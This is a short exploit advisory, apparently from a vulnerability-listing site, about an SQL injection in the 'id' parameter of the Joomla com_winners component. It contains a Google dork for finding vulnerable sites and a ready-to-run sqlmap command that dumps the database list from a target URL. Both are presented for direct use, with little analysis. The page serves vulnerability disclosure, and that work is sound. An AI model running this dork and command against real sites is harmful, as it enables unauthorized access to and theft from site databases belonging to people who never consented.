Joomla com_winners - 'id' Parameter SQL Injection

2017.04.08
Credit: Shahab Shamsi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Information: ===================================== [-] Title : Joomla com_winners - 'id' Parameter SQL Injection [-] Author : Shahab Shamsi [-] Contact Me : SecurityMan.Org [-] Vendor : http://joomla.org/ [-] Category : Web Application [-] Date : 07.April.2017 [-] Tested On : SQLMap Google Dork: ===================================== inurl:/index.php?option=com_winners Exploit: ====================================== >sqlmap.py -u "http://site/index.php?option=com_winners&view=winner_detail&id=[SQL]6&Itemid=683&lang=en" -p id --dbs Video : ====================================== https://www.youtube.com/watch?v=J9TsSe80B28 http://securityman.org/joomla-com_winners-id-parameter-sql-injection/

References:

https://www.youtube.com/watch?v=J9TsSe80B28
http://securityman.org/joomla-com_winners-id-parameter-sql-injection/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top